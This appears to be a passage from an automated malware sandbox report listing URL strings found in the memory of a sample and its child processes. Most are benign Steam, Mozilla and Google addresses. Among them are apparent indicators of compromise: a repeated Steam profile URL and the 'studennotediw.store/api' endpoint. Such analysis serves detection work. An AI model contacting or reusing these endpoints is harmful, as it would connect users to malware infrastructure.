Source: 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F
Source: file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 26e226f915.exe, 0000000B.00000002.2904278824.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/nnzF
Source: file.exe, 00000000.00000003.2142550438.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134448591.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134302834.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904278824.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032933485.0000000001619000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 26e226f915.exe, 0000000B.00000003.2901522746.0000000001152000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904685604.0000000001153000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001150000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900&&MR(
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 26e226f915.exe, 0000000D.00000003.3032933485.0000000001619000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900_
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: file.exe, 00000000.00000003.2134302834.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904278824.00000000010FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: 26e226f915.exe, 0000000D.00000003.3032933485.0000000001605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/765611997243319003J
Source: file.exe, 00000000.00000003.2142391592.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142550438.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.stea
Source: 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: file.exe, 00000000.00000003.2134302834.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134302834.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134448591.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904278824.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: file.exe, 00000000.00000003.2134302834.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134448591.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904278824.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba2
Source: 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 26e226f915.exe, 0000000B.00000003.2901522746.0000000001152000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904685604.0000000001153000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001150000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store/api
Source: file.exe, 00000000.00000003.2134302834.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/api
Source: 26e226f915.exe, 0000000D.00000003.3032933485.0000000001605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/apiVJr
Source: firefox.exe, 0000001B.00000002.3306081297.0000017084541000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: 26e226f915.exe, 0000000D.00000003.3094784478.0000000006106000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3204452985.0000000005C85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpError
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3208884492.00000170837CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3217108520.00000170837CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingspromiseLangPacksUpdated
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3271364302.0000017080000000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesCaptiveProtalDetector
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3271364302.0000017080000000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationSetting
Source: 26e226f915.exe, 0000000D.00000003.3094784478.0000000006106000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3204452985.0000000005C85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/_validateBranches/schema
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: file.exe, 00000000.00000003.2183850637.000000000573A000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3109202383.0000000005E22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3217655123.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219276546.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219501177.0000000005975000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3088112226.000001708360F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3327365979.000001708527D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3082674705.0000017083400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3089312930.0000017083631000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3090212714.0000017083652000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EA9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296245182.0000017083800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3327365979.0000017085290000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292795200.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.co
Source: file.exe, 00000000.00000003.2142550438.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142360796.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000162F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/acc
Source: file.exe, 00000000.00000003.2142550438.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/accesp
Source: file.exe, 00000000.00000003.2142360796.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000162F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3110614517.000001708BF0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3088112226.000001708360F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3082674705.0000017083400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3312875221.0000017084DF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3089312930.0000017083631000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3090212714.0000017083652000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EA9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296245182.0000017083800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
